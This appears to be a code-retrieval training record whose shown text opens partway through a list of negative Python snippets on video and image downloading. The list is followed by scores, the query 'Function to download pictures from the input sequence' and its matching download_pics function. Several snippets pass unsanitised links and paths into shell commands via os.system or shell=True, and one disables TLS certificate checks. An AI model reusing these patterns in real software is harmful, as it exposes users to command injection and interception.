save_link_time(return_list, path_to_download):\n\n # Opens a new file and writes lines to it and saves it at the spot provided\n with open(os.path.join(path_to_download, \"yt_vids.txt\"), \"w\") as w:\n w.write('\\n'.join('{} {} {}'.format(\n x[0], x[1][0], x[1][1]) for x in return_list))", "def download_vid(vid_link, quality_num=None):\r\n if quality_num is not None:\r\n # if quality_num provided\r\n try:\r\n os.system(\"youtube-dl -f \"+str(quality_num)+\" \\'\"+str(vid_link)+\"\\'\")\r\n except Exception:\r\n print(Exception)\r\n else:\r\n # by default the best quality is downloaded\r\n try:\r\n os.system(\"youtube-dl \"+str(vid_link))\r\n except Exception:\r\n print(Exception)", "def generate_video_from_frames(path_to_frames, title):\r\n mean_height = 0\r\n mean_width = 0\r\n num_of_images = load_one_setting(settings_filename, 'MAX_CYCLES')\r\n os.chdir(path_to_frames)\r\n '''Loading all frames'''\r\n for file in os.listdir('.'):\r\n if file.endswith(\".jpg\") or file.endswith(\".jpeg\") or file.endswith(\"png\") or file.endswith(\"JPEG\"):\r\n im = Image.open(file)\r\n width, height = im.size\r\n mean_width += width\r\n mean_height += height\r\n\r\n mean_width = int(mean_width / num_of_images)\r\n mean_height = int(mean_height / num_of_images)\r\n\r\n for file in os.listdir('.'):\r\n if file.endswith(\".jpg\") or file.endswith(\".jpeg\") or file.endswith(\"png\") or file.endswith(\"JPEG\"):\r\n im = Image.open(file)\r\n imResize = im.resize((mean_width, mean_height), Image.ANTIALIAS)\r\n imResize.save(file, 'JPEG', quality=95)\r\n release_video(title)\r\n os.chdir(r'../..')", "def split_video_random(file_path, start_pos, split_length, out_path):\n s_cmd = \" -i '%s'\"%(file_path) #use default CODEC\n try:\n\tfileext = file_path.split(\".\")[-1]\n except IndexError as e:\n\traise IndexError(\"No ext. in filename. Error: \" + str(e))\n\n split_start = start_pos\n split_length = split_length\n head, tail = os.path.split(file_path)\n name, ext = tail.split('.')\n filebase=name+'_'+str(start_pos)+'-'+str(split_length)\n\n dstfilebase = out_path + '/' + filebase # create output file base\n\n #split_str = \"\"\n #split_str += \" -ss \" + str(split_start) + \" -t \" + str(split_length) + \" '\"+ dstfilebase + \".\" + fileext + \"'\"\n\n s_str = \"\"\t\n #s_str += \"ffmpeg\"+\" -ss \"+str(split_start)+\" -t \"+str(split_length) + s_cmd + \" '\"+dstfilebase + \".\" + fileext + \"'\"\n s_str += \"ffmpeg\" + \" -ss \" + str(split_start) + s_cmd + \" -t \" + str(split_length) + \" '\"+ dstfilebase + \".\" + fileext + \"'\"\n print(\"########################################################\")\n #print \"About to run: \"+split_cmd+split_str\n print(\"About to run: \"+s_str)\n print(\"########################################################\")\n #output = subprocess.Popen(split_cmd+split_str, shell = True, stdout = subprocess.PIPE).stdout.read()\n output = subprocess.Popen(s_str, shell=True, stdout=subprocess.PIPE).stdout.read()", "def death_as_a_service(vid_path='vids', max_downloads=4,\n to_imgur=False, to_tumblr=True, to_snapchat=True):\n print \"Fetching new videos and consolidating queue...\"\n yt.populate_queue()\n yt.dl(max_downloads)\n extract_and_upload(vid_path, to_imgur=to_imgur,\n to_tumblr=to_tumblr, to_snapchat=to_snapchat)", "def test_task_video_download(url_to_video: str, empty_video_resource: VideoResource):\n download_video(url_to_video, empty_video_resource.id)\n empty_video_resource.refresh_from_db()\n video_instance = empty_video_resource.videos.filter(primary=True).first()\n\n assert empty_video_resource.videos.all()\n assert video_instance.extension == 'mp4'\n assert video_instance.primary\n for item in video_instance.video.open():\n assert item", "def download_clips(data: dict, length: float, path: str) -> list:\r\n amount = 0\r\n length *= 60\r\n names = []\r\n\r\n for clip in data:\r\n\r\n download_clip(data[clip][\"url\"], path)\r\n length -= data[clip][\"duration\"]\r\n\r\n name = data[clip][\"display_name\"]\r\n amount += 1\r\n\r\n if name not in names:\r\n names.append(name)\r\n\r\n log.info(f\"Remaining video length: {ceil(length)} seconds.\\n\")\r\n\r\n # If the rendered video would be long enough\r\n # we break out of the loop, else continue\r\n if length <= 0:\r\n break\r\n\r\n # If the rendered video would be long enough or we\r\n # have ran out of clips, we return the streamer names\r\n log.info(f\"Downloaded {amount} clips.\\n\")\r\n return names", "def main(file_path, urls):\n # format urls input\n with open(urls, 'r') as file:\n urls = file.read().replace('\\n', '')\n\n urls = urls.strip('[]')\n urls = re.findall(r'\\([^\\)\\(]*\\)', urls)\n\n for file in urls:\n\n file_name, url = tuple(file.strip('()').split(', '))\n\n # check if file is already downloaded\n if os.path.exists(os.path.join(file_path, file_name)):\n print(\"%s already exists.\\n\" % file_name)\n continue\n else:\n print(\"Starting download for %s...\\n\" % file_name)\n\n # Create the data subdirectory if it doesn't exist\n os.makedirs(file_path, exist_ok=True)\n\n # create response object\n r = requests.get(url, stream=True)\n widgets = [\"Progress: \",\n progressbar.DataSize(), \"| \",\n progressbar.Timer()]\n bar = progressbar.ProgressBar(widgets=widgets,\n max_value=progressbar.UnknownLength)\n value = 0\n # download started\n with open(os.path.join(file_path, file_name), 'wb') as f:\n for chunk in r.iter_content(chunk_size=64*1024):\n if chunk:\n f.write(chunk)\n value += len(chunk)\n bar.update(value)\n\n print(\"\\n%s downloaded!\\n\" % file_name)\n\n print(\"All files downloaded!\")", "def get_files(url, thresholds, resolution, r_factor):\n selection_page = urllib.urlopen(url).read()\n\n threshold = '|'.join(['%s'% t for t in thresholds])\n pattern = '\\s(cullpdb_pc(%s)_res%s_R%s_.*\\d\\.gz)' % (threshold, resolution, r_factor)\n\n files = re.findall(pattern, selection_page)\n\n output = None\n for filename,threshold in files:\n printc('Downloading: %s' % filename)\n #get file\n file = urllib.urlopen(url +'/'+ filename )\n raw = file.read()\n\n #write contents to file\n try:\n output = open(pdb_select_settings.PDB_TMP_DIR+'/'+filename, \"w\")\n output.write(raw)\n\n finally:\n if output:\n output.close()\n\n return files", "def download_clip(row, label_to_dir, trim, trimmed_label_to_dir, count):\n\n label = row['label']\n filename = row['youtube_id']\n time_start = row['time_start']\n time_end = row['time_end']\n\n # if trim, save full video to tmp folder\n output_path = label_to_dir['tmp'] if trim else label_to_dir[label]\n\n ydl_opts = {\n 'format': 'bestvideo[ext=mp4][filesize <? 50M]',\n }\n \n # Don't download if the video has already been trimmed\n has_trim = False\n if trim:\n start = str(time_start)\n end = str(time_end - time_start)\n output_filename = os.path.join(trimmed_label_to_dir[label],\n filename + '_{}_{}'.format(start, end) + VIDEO_EXTENSION)\n\n has_trim = os.path.exists(output_filename)\n\n # Don't download if already exists\n if not os.path.exists(os.path.join(output_path, filename + VIDEO_EXTENSION)) and not has_trim:\n print('Start downloading: ', filename) \n ydl_opts['outtmpl'] = os.path.join(output_path, '%(id)s.%(ext)s')\n \n try:\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([URL_BASE + filename])\n except YoutubeDLError as e:\n print('Download failed for ' + filename)\n log.warning(filename)\n return False\n\n print('Finish downloading: ', filename)\n else:\n print('Already downloaded: ', filename)\n\n if trim:\n # Take video from tmp folder and put trimmed to final destination folder\n # better write full path to video\n\n\n input_filename = os.path.join(output_path, filename + VIDEO_EXTENSION)\n\n if has_trim:\n print('Already trimmed: ', filename)\n else:\n print('Start trimming: ', filename)\n # Construct command to trim the videos (ffmpeg required).\n command = 'ffmpeg -i \"{input_filename}\" ' \\\n '-ss {time_start} ' \\\n '-t {time_end} ' \\\n '-c:v libx264 -c:a copy -threads 1 -y -nostdin ' \\\n '\"{output_filename}\"'.format(\n input_filename=input_filename,\n time_start=start,\n time_end=end,\n output_filename=output_filename\n )\n try:\n subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)\n except subprocess.CalledProcessError as e:\n print('Error while trimming: ', filename)\n log.warning(filename)\n return False\n print('Finish trimming: ', filename)\n\n print('Processed %i out of %i' % (count + 1, TOTAL_VIDEOS))", "def downloader(thread_num):\n tid = 'Thread ' + numprefix.format(thread_num) + ': '\n for i in range(thread_num, len(self.titles), thread_count):\n title, link = self.titles[i], self.download_urls[i]\n name = vidprefix.format(i) + ' ' + title + '.mp4'\n tries = 0\n while (not os.path.exists(name) or os.path.getsize(name) == 0) \\\n and tries <= trycount:\n if os.path.exists(name): os.remove(name)\n self.log(tid + 'Calling wget for ' + name)\n subprocess.call(['wget', '--output-document=' + name, link])\n tries += 1\n if (not os.path.exists(name) or os.path.getsize(name) == 0):\n self.log(tid + 'wget failed for ' + name)\n else:\n self.log(tid + 'wget successfully downloaded ' + name)", "def download_files(self, inpDate):\n # construct day of year from date\n inpDoY = inpDate.timetuple().tm_yday\n strDoY = str(inpDoY)\n if inpDoY < 10:\n strDoY = \"00\" + str(inpDoY)\n if ( inpDoY > 10) & (inpDoY < 100):\n strDoY = \"0\" + str(inpDoY)\n\n dwnldUrl = self.baseUrl +\\\n \"data_fetch_l1c_imaging_v013?y=\"+\\\n str(inpDate.year) + \"&d=\"+strDoY\n driver = webdriver.Chrome()\n driver.get(dwnldUrl)\n\n try:\n element = WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.ID, 'output')))\n filesDiv = driver.find_element_by_id(\"output\")\n fileLinks = filesDiv.find_elements_by_css_selector('a')\n for uEl in fileLinks:\n fUrl = uEl.get_attribute('href')\n if \"L1C-2-disk\" not in fUrl:\n continue\n print \"currently downloading-->\", fUrl\n rf = requests.get( fUrl, verify=False )\n currFName = rf.url.split(\"/\")[-1]\n outDir = self.outBaseDir + inpDate.strftime( \"%Y%m%d\" ) + \"/\"\n if not os.path.exists(outDir):\n os.makedirs(outDir)\n with open( outDir + currFName, \"wb\" ) as ssusiData:\n ssusiData.write( rf.content )\n finally:\n driver.quit()", "def extract_videos(download_dir, extract_dir):\n\n filename = os.path.join(download_dir, 'UCF101.rar')\n patoolib.extract_archive(filename, outdir=extract_dir)\n\n # os.remove(filename)\n\n return None" ]
[ "0.6634631", "0.6432747", "0.63896453", "0.6305958", "0.60365444", "0.59619087", "0.5885181", "0.5815725", "0.56896555", "0.5573953", "0.5560245", "0.5557694", "0.55472976", "0.5520894", "0.5493748", "0.5459092", "0.54333603", "0.54173565", "0.54105514", "0.54061747", "0.54023707", "0.5356837", "0.5349421", "0.5303259", "0.52836955", "0.52768236", "0.5275138", "0.52495116", "0.5224876", "0.5218306", "0.52167946", "0.520242", "0.5181545", "0.5180293", "0.5165296", "0.5155829", "0.51550394", "0.5154717", "0.5150425", "0.5146917", "0.513512", "0.51251346", "0.5119905", "0.5110614", "0.51009345", "0.5100899", "0.50952303", "0.5066582", "0.50614774", "0.5056301", "0.5038726", "0.5036382", "0.5032848", "0.5025131", "0.50157905", "0.50124776", "0.5011052", "0.50006753", "0.49994865", "0.4992856", "0.49805388", "0.497642", "0.4975179", "0.4971689", "0.49700418", "0.49532133", "0.49482486", "0.49458724", "0.49344832", "0.4919799", "0.49174953", "0.49105108", "0.49057063", "0.49054143", "0.4892793", "0.48916277", "0.48896477", "0.4885288", "0.48843154", "0.48629534", "0.48505142", "0.48494148", "0.48426855", "0.48341072", "0.48321477", "0.48260036", "0.48219877", "0.48217186", "0.4818734", "0.4814717", "0.48141858", "0.48087275", "0.47986725", "0.47985286", "0.47942868", "0.4789459", "0.4788718", "0.47868714", "0.47848457", "0.47837964" ]
0.79695
0
Function to download pictures from the input sequence
def download_pics(pics_links): for link in range(len(pics_links)): r = requests.get(pics_links[link][0]) with open(os.path.join("tmp", f"{link}.jpg"), "wb") as dl: dl.write(r.content)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def downloadLocal(url_list,path):\n print(\"You are downloading {} images\".format(parser_arguments().limit),end=\" \");print(\"of {} class.\".format(parser_arguments().classes))\n print(\"Please, be patient :)\")\n for i in range(len(url_list)):\n filename= url_list[i].split(\"/\")[-1] # name of the picture file\n r = requests.get(url_list[i], stream =True)\n print(filename)\n\n with open(filename,'wb') as f : # create the file locally in binary-write mode\n r = requests.get(url_list[i], stream =True)\n shutil.copyfileobj(r.raw, f) #write our image to the file\n shutil.move(filename,path)\n print('Done!')", "def download_urls(urls, path):\n count = 0\n if urls:\n for url in urls:\n try:\n res = requests.get(url, verify=False, stream=True)\n rawdata = res.raw.read()\n with open(os.path.join(path, 'img_' + str(count) + '.jpg'), 'wb') as f:\n f.write(rawdata)\n count += 1\n except Exception as e:\n print('Failed to write rawdata.')\n print(e)", "def download_engine(fcsd): #fcsd = first comic strip date\n\n url_list = get_comic_strip_url(fcsd)\n\n for url in url_list:\n session = requests.Session()\n response = session.get(url)\n download_url = get_image_comic_url(session, response)\n# download_dilbert(session, download_url)\n return download_url", "def download_image(urls):\r\n image_paths = []\r\n\r\n base_url = \"https://classifieds.castanet.net\"\r\n image_directory = os.path.join('C:\\\\', 'users', 'ccholon', 'my documents', 'castanet images')\r\n\r\n for url in urls:\r\n listing_url = base_url + url\r\n image_page = requests.get(listing_url)\r\n image_soup = BeautifulSoup(image_page.text, 'html.parser')\r\n\r\n # find the URL for the listing image\r\n image_element = image_soup.find(name='div', class_='image_container')\r\n image_element = image_element.find(name='img')\r\n image_url = image_element.get('src')\r\n\r\n # download the image\r\n #image = requests.get(image_url, stream=True)\r\n\r\n # save to local directory\r\n #image_file = open(os.path.join(image_directory, os.path.basename(image_url)), 'wb')\r\n #for bytes in image.iter_content(100000):\r\n #image_file.write(bytes)\r\n #image_file.close()\r\n\r\n image_paths.append(os.path.join(image_directory, os.path.basename(image_url)))\r\n\r\n return image_paths", "def downloadImages(self):\n\t\ti = 0\n\t\tfor im in self.images:\n\t\t\t# Let's get the file extension and file name and make the final file path. \n\t\t\t# We need to do this to slugify the file name and avoid errors when loading images\n\t\t\tfile_name, file_extension = os.path.splitext(im['url'])\n\t\t\tfile_name = file_name.split(\"/\")[-1]\n\n\t\t\tfile_path = self.data_path + self.dataset + \"/\" + im['slug'] + '/' + str(im['id']) + '_' + slugify(file_name) + file_extension\n\n\t\t\t# If file is not in the file path, then download from the url\n\t\t\tif not os.path.exists(file_path):\n\t\t\t\ttry:\n\t\t\t\t\turllib.urlretrieve(im['url'], file_path )\n\t\t\t\t\tprint \"i:{} url:{}\".format(i,im['url'])\n\t\t\t\texcept Exception, e:\n\t\t\t\t\tprint e\n\t\t\ti += 1", "def download_images(src_dir, dest_dir):\n # +++your code here+++\n if not os.path.exists(dest_dir):\n os.mkdir(dest_dir)\n res=utility(src_dir)\n k=0\n f=file(dest_dir+\"/\"+\"index.html\", 'w')\n f.write(\"<html><body>\")\n for i in res:\n local_name='image'+str(k)\n print \"downloading image%d\" %(k)\n urllib.urlretrieve(i, os.path.join(dest_dir, local_name))\n f.write(\"<img src=\"+'\"'+os.path.join(dest_dir, local_name)+'\"'+\">\")\n k+=1\n f.write(\"</body></html>\")\n f.close()\n cmd=\"xdg-open\"+\" \"+'\"'+dest_dir+\"/\"+\"index.html\"+'\"'\n (status, output)=commands.getstatusoutput(cmd)\n sys.exit(1)", "def download(query, destination='', max_items=None):\n destination = os.path.join(destination, query)\n eol_id = search(query)\n urls = []\n for idx, url in enumerate(get_images(eol_id)):\n filepath = os.path.join(destination, str(idx))\n data.download_image(url, filepath)\n print(idx)\n if max_items and idx >= max_items:\n break", "def downloadMinio(url_list,list_d):\n print(\"You are downloading {} images\".format(parser_arguments().limit),end=\" \");print(\"of {} class.\".format(parser_arguments().classes))\n print(\"Please, be patient :)\")\n name = \"-\".join(parser_arguments().classes)\n name = name.lower()\n for i in range(len(url_list)):\n filename= url_list[i].split(\"/\")[-1] # name of the picture file\n r = requests.get(url_list[i], stream =True)\n\n\n if r.status_code == 200:\n r.raw.decode_content = True\n\n with open(filename,'wb') as f : # create the file locally in binary-write mode\n metadata = list_d[i]\n r = requests.get(url_list[i], stream =True)\n shutil.copyfileobj(r.raw, f) #write our image to the file\n path = os.getcwd()+'/'+filename # image path\n minioClient.fput_object(name,filename,path,'image/jpg',metadata)\n os.remove(filename)\n print(filename,'have been successfuly uploaded')\n print('Done!')", "def download_images(keyword, limit = 1):\n #creating list of arguments\n arguments = {\"keywords\": keyword ,\n \"limit\": limit , \n \"print_urls\": False,\n \"output_directory\": OUT_DIR} \n\n # Pass the arguments to above function and download images\n paths = response.download(arguments)", "async def dl_image(url, filename):\n\ttry:\n\t\twith aiohttp.ClientSession() as session:\n\t\t\tasync with session.get(url) as resp:\n\t\t\t\ttest = await resp.read()\n\t\t\t\twith open('data/tmp/'+filename.lower(), \"wb\") as f:\n\t\t\t\t\tf.write(test)\n\t\t\t\treturn 0\n\texcept Exception as e:\n\t\tprint('[!ERROR!] in Get image')\n\t\tprint(e)\n\t\treturn -1", "def download_images_jpg(self):\n self.show_as_waiting(True)\n self.download_images('JPEG')\n self.show_as_waiting(False)", "def download(word, n_images=100):\n\n # Fields for pixbay from https://pixabay.com/api/docs/#api_search_images\n\n http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())\n\n for i in range(5):\n fields = {\n \"key\": _(s.__secret__, egg_open()),\n \"q\": word,\n \"image_type\": \"photo\",\n \"safesearch\": \"true\",\n \"per_page\": max(3, min(200, n_images + i))\n }\n\n debug_log(f\"fields for request:\\n{ {key: fields[key] for key in fields.keys() if key != 'key'} }\")\n\n r = http.request(method='GET',\n url='https://pixabay.com/api/',\n fields=fields)\n\n debug_log(f\"Response data: {r.data}\")\n\n if \"ERROR\" in str(r.data, 'utf-8'):\n continue\n else:\n break\n\n try:\n data = json.loads(r.data.decode('utf-8'))\n except json.decoder.JSONDecodeError as e:\n warnings.warn(\"Cannot download '{word}'. Bad response: {response}\".format(\n word=word,\n response=str(r.data, 'utf-8')\n ))\n return False\n\n image_urls = [item[\"largeImageURL\"] for item in data[\"hits\"]]\n image_ids = [item[\"id\"] for item in data[\"hits\"]]\n\n\n debug_log(f\"Image urls: {image_urls}\")\n debug_log(f\"Len Image urls: {len(image_urls)}\")\n\n save_dir = os.path.join(s.__STEP_1_CACHE_DIR__, word)\n os.makedirs(save_dir, exist_ok=True)\n\n if len(image_urls) < n_images:\n warnings.warn(\"Not enough images for {word}. Only {len_image_urls} instead of {n_images}.\".format(\n word=word,\n len_image_urls=len(image_urls),\n n_images=n_images\n ))\n open(os.path.join(save_dir, \"SATURATED\"), 'w').close()\n open(os.path.join(save_dir, \"DO_NOT_DELETE\"), 'w').close()\n\n image_paths = [get_unique_save_path_name(save_dir,\n im_id,\n im_url.split('.')[-1]) # Get the right image extension\n for im_id, im_url in zip(image_ids, image_urls)]\n\n debug_log(f\"Image paths: {image_paths}\")\n\n for i, im_url, im_path in zip(range(len(image_urls)), image_urls, image_paths):\n debug_log(f\"Downloading '{word}' image [{i+1}/{len(image_urls)}]: {im_url}\")\n save_file(im_url, im_path, http)\n debug_log(f\"Done! Saved as {im_path}\")\n\n return True", "def download_images(links):\n\n for link in links:\n print(\"Processing\", link)\n try:\n response = requests.get(link,\n timeout=METADATA_REQUEST_TIMEOUT, stream=True)\n except requests.exceptions.RequestException as e:\n print(e)\n sys.exit(1)\n\n artist_name = link.rsplit('/', 2)[1]\n image_name = link.rsplit('/', 2)[2]\n image_name = artist_name + image_name\n\n file_location = ASSET_PATH.joinpath(image_name)\n\n with open(str(file_location), 'wb') as outfile:\n shutil.copyfileobj(response.raw, outfile)", "def download_img(self, url, output):\n try:\n print(\"Downloading from: %s\" % url)\n with open(output, 'wb') as f:\n f.write(urllib2.urlopen(url).read())\n print(\"Wrote to: %s\" % output)\n except IOError, e:\n print(e)", "def getimgs():", "def get_image(self, index):\r\n \r\n # Get request to get all the links for all exercises\r\n image = requests.get(API.url_image, headers = self.headers).json()\r\n filename = download(image[index]['image'])", "def download_imgs(img_urls, outfolder):\n \n print \"Downloading %d images from: \" %len(img_urls), url\n \n for image in img_urls:\n filename = image.split('/')[-1]\n outpath = os.path.join(outfolder, filename)\n img_url = urljoin(url, image)\n try:\n urlretrieve(image, outpath)\n print img_url, \"downloaded successfully.\"\n \n except IOError:\n print \"Failed to download file:\", img_url\n pass", "def download_card_images(self, card_names, lang=\"en\"):\n for card_name in card_names:\n print(\"Dowloading card imgs for \\'\" + card_name + \"\\' (\" + lang + \")\")\n output_file_name = card_name + \".jpg\"\n output_file_path = IoManager.CARD_IMAGES_PATH_EN + \"/\" + output_file_name if lang == \"en\" else IoManager.CARD_IMAGES_PATH_FR + \"/\" + output_file_name\n output_file_path = output_file_path.replace('//', '__')\n en_url, fr_url = self.get_card_urls(card_name)\n url = en_url if lang == \"en\" else fr_url\n # Open the url image, set stream to True, this will return the stream content.\n resp = requests.get(url, stream=True)\n # Open a local file with wb ( write binary ) permission.\n local_file = open(output_file_path, 'wb')\n # Set decode_content value to True, otherwise the downloaded image file's size will be zero.\n resp.raw.decode_content = True\n # Copy the response stream raw data to local image file.\n shutil.copyfileobj(resp.raw, local_file)\n # Remove the image url response object.\n del resp", "def regular_download(self) -> NoReturn:\n\n if not path.isdir(self.name):\n mkdir(self.name)\n\n for chapter in self.chapters.keys():\n\n chapter_folder = f\"{self.name}/{chapter}/\"\n curr_chapter = self.chapters[chapter]\n base_url = f\"{curr_chapter['server']}{curr_chapter['hash']}/\"\n\n if not path.isdir(chapter_folder):\n mkdir(chapter_folder)\n\n for image in curr_chapter[\"images\"]:\n\n image_url = f\"{base_url}{image}\"\n image_file = f\"{chapter_folder}{image}\"\n response = requests.get(image_url, headers={\"Connection\":\"close\"})\n\n if response and response.status_code == 200:\n with open(image_file, \"wb\") as img_file:\n img_file.write(response.content)\n else:\n print(f\"Error downloading chapter: {curr_chapter['num']} Image: {image}\")", "async def save_url_images(images):\n for source, image in images:\n name = source.split('/')[-1]\n async with aiofiles.open(f'{OUTPUT_FOLDER}/{name}', 'wb') as f:\n await f.write(image)", "def download_images(urlList):\n fileNumber = 1;\n fileName = \"\"\n\n # urlList[0] is just titles, so we start at 1\n for url in urlList[1:]:\n sys.stdout.write(\"\\rFile number %i of %i \" % (fileNumber+1, len(urlList)))\n\n sys.stdout.flush()\n\n try:\n fileName = str(fileNumber) + \".png\"\n # Download the file from `url` and save it locally under `fileName`:\n # I append png to the end of the file to \"make it\" png, but there's definitely a better way\n with urllib.request.urlopen(url) as response, open(fileName, 'wb') as out_file:\n shutil.copyfileobj(response, out_file)\n except urllib.error.HTTPError:\n sys.stdout.flush()\n print(\"\\r %s is not a downloadable image. Skipping to next url...\" % url)\n \n fileNumber += 1;\n\n sys.stdout.write(\"\\r\\nDone!\")\n sys.stdout.flush()\n sys.stdout.write(\"\\r\\n\")", "def download_images(img_urls, dest_dir):\n # +++your code here+++\n (errcode, statusmsg) = check_create_dir(dest_dir)\n if errcode:\n print statusmsg\n sys.exit(errcode)\n else: print statusmsg\n # retrieve images and generate html code for files\n html_str = '<html>\\n<body>\\n' # opening html file tags\n i = 0\n for img in img_urls:\n img_filename = 'img' + str(i)\n full_filepath = os.path.join(dest_dir, img_filename) \n print 'Retrievieng ' + img + ' to ' + full_filepath + ' file..'\n urllib.urlretrieve(img, full_filepath)\n html_str += '<img src=\\\"' + img_filename + '\\\">'\n i += 1\n html_str += '\\n</html>\\n</body>' # closing html file tags\n # create html file\n html_filename = os.path.join(dest_dir, 'index.html')\n f = open(html_filename, 'w')\n f.write(html_str) \n f.close()\n print 'File ' + html_filename + ' was created.'", "def downloader(urls, path):\n counter = 1\n for media_file in urls:\n # Create the file name\n file_name = \"meme\" + str(counter) + \".jpg\"\n file_location = path + \"/\" + file_name\n print(f\"Downloading {media_file} as {file_name}.\")\n # Overwrite files\n if os.path.exists(file_location):\n os.remove(file_location)\n print(f\"{file_name} will overwrite an existing file of the same name.\")\n wget.download(media_file, out=file_location)\n print(\"\\n\")\n counter += 1\n print(f\"{counter - 1} items were downloaded.\")\n return counter - 1", "def download_photos(urls, folder=''):\n folder_path = os.path.join('photos', folder)\n if not os.path.exists(folder_path):\n os.mkdir(folder_path)\n for url in urls:\n image = requests.get(url)\n filename = os.path.join(folder_path, url.split('/')[-1])\n with open(filename, 'wb') as f:\n f.write(image.content)", "def download_images(main_keyword, supplemented_keywords, download_dir): \n image_links = set()\n print('Process {0} Main keyword: {1}'.format(os.getpid(), main_keyword))\n\n # create a directory for a main keyword\n img_dir = download_dir + main_keyword + '/'\n if not os.path.exists(img_dir):\n os.makedirs(img_dir)\n\n for j in range(len(supplemented_keywords)):\n print('Process {0} supplemented keyword: {1}'.format(os.getpid(), supplemented_keywords[j]))\n search_query = quote(main_keyword + ' ' + supplemented_keywords[j])\n # url = 'https://www.google.com/search?q=' + search_query + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg'\n url = 'https://www.google.com/search?q=' + search_query + '&source=lnms&tbm=isch'\n image_links = image_links.union(parse_page(url))\n print('Process {0} get {1} links so far'.format(os.getpid(), len(image_links)))\n time.sleep(2)\n print (\"Process {0} get totally {1} links\".format(os.getpid(), len(image_links)))\n\n print (\"Start downloading...\")\n count = 1\n for link in image_links:\n try:\n req = urllib.request.Request(link, headers = {\"User-Agent\": generate_user_agent()})\n response = urllib.request.urlopen(req)\n data = response.read()\n file_path = img_dir + '{0}.jpg'.format(count)\n with open(file_path,'wb') as wf:\n wf.write(data)\n print('Process {0} fininsh image {1}/{2}.jpg'.format(os.getpid(), main_keyword, count))\n count += 1\n except urllib.error.URLError as e:\n logging.error('URLError while downloading image {0}\\nreason:{1}'.format(link, e.reason))\n continue\n except urllib.error.HTTPError as e:\n logging.error('HTTPError while downloading image {0}\\nhttp code {1}, reason:{2}'.format(link, e.code, e.reason))\n continue\n except Exception as e:\n logging.error('Unexpeted error while downloading image {0}\\nerror type:{1}, args:{2}'.format(link, type(e), e.args))\n continue\n\n print(\"Finish downloading, total {0} errors\".format(len(image_links) - count))", "def download(subreddits):\r\n print(subreddits)\r\n pic_urls = get_urls.reddit_pics(subreddits, PAGES, SORTING, TIME_PERIOD)\r\n image_downloader.check_folder(FOLDER_PATH)\r\n image_downloader.download_pics(pic_urls, FOLDER_PATH)", "def download_images(pages):\n try:\n pool = Pool(conf.MAX_PROCESS)\n pool.map_async(get_image_from_page, pages)\n pool.close()\n pool.join()\n except:\n pool.close()\n pool.join()", "def download_images_png(self):\n self.show_as_waiting(True)\n self.download_images('PNG')\n self.show_as_waiting(False)", "def download_dilbert(s, u):\n with open(\"comicfile.jpg\", \"wb\") as file:\n response = s.get(u)\n file.write(response.content)", "def download_images(image_urls):\n fetched = []\n count = 0\n for img_url in image_urls:\n if not db.is_image_in_db(img_url):\n filename = os.path.basename(img_url)\n if not os.path.exists(cfg.PHOTO_DIR + filename):\n referer_string = web.get_referrer_string(img_url) # to trick 4walled.org\n cmd = \"wget -t {retry_count} -T {timeout} {ref} {url} -O {save}\".format(url=img_url,\n save=os.path.join(cfg.PHOTO_DIR, filename),\n ref=referer_string,\n retry_count=cfg.WGET_RET,\n timeout=cfg.WGET_TIMEOUT)\n print cmd\n os.system(cmd)\n fetched.append(img_url)\n count += 1\n else:\n print(\"# {0} was already fetched once...\".format(img_url))\n\n print(\"# new imgage(s): {0}\".format(count))\n return fetched", "def do_get_image_sequence():\n sequence_range = 1000000000\n try:\n n = int(request.args.get(\"n\", 1))\n except (TypeError, ValueError):\n return abort(400)\n\n rv = {\n \"sequence_list\": [\n i % sequence_range\n for i in sequence_values(image_sequence, n)\n ]\n }\n\n if n == 1:\n rv[\"sequence_no\"] = rv[\"sequence_list\"][0]\n\n return jsonify(rv)", "def download_pics(pic_urls, directory):\r\n print(\"downloading pictures...\")\r\n for url in pic_urls:\r\n name = url.split(\"/\")[-1]\r\n if len(name) >= 20:\r\n name = name[len(name)-20:]\r\n \r\n print('from:', url)\r\n pic_path = directory + name\r\n if not os.path.exists(pic_path):\r\n print(\"downloading ->\", pic_path)\r\n try:\r\n urllib.request.urlretrieve(url, pic_path)\r\n except ValueError:\r\n # 'http://' missing from link\r\n urllib.request.urlretrieve(\"http://\" + url, pic_path)\r\n except urllib.error.HTTPError:\r\n # access forbidden\r\n # ex: http://puu.sh/n2zPL/2491975ef3.jpg\r\n print(\"URL skipped due to HTTPError\", url)\r\n else:\r\n print(\"already downloaded ->\", pic_path)\r\n print(\"Downloads Finished\")", "def _download_images(self, image_urls: typing.List[str], save_dir: str) -> typing.List[str]:\n\n\t\timage_paths = []\n\n\t\tfor i, url in enumerate(image_urls):\n\t\t\timage = self.send_request_image(url)\n\n\t\t\timage_ext = url.split(\".\")[-1]\n\n\t\t\timage_dst_path = os.path.join(save_dir, f\"{i}.{image_ext}\")\n\n\t\t\tif image is not None:\n\t\t\t\twith open(image_dst_path, \"wb\") as fh:\n\n\t\t\t\t\t# Magic boolean which makes it work\n\t\t\t\t\timage.raw.decode_content = True\n\n\t\t\t\t\t# noinspection PyBroadException\n\n\t\t\t\t\t# Attempt to download the image from the URL\n\t\t\t\t\ttry:\n\t\t\t\t\t\tshutil.copyfileobj(image.raw, fh)\n\n\t\t\t\t\t# We should reduce the scope\n\t\t\t\t\texcept Exception:\n\t\t\t\t\t\tpass\n\n\t\t\t\t\t# We downloaded the image without any errors\n\t\t\t\t\telse:\n\t\t\t\t\t\timage_paths.append(image_dst_path)\n\n\t\treturn image_paths", "def download_img(url,name):\n resp = download(url)\n if (resp!=None):\n image = np.asarray(bytearray(resp), dtype=\"uint8\")\n image = cv2.imdecode(image, cv2.IMREAD_COLOR)\n cv2.imwrite(name,image)\n return", "def download(url, out_folder):\n \n filename = \"2.png\"\n \n outpath = os.path.join(out_folder, filename)\n \n if url.lower().startswith(\"http\"):\n urlretrieve(url, outpath)\n else:\n urlretrieve(urlparse.urlunparse(parsed), outpath)", "def download(self):\n\n if not self.plateifu:\n return None\n\n plate, ifu = self.plateifu.split('-')\n dir3d = self._get_image_dir()\n\n name = 'mangaimage'\n\n return super(Image, self).download(name, ifu=ifu, dir3d=dir3d,\n 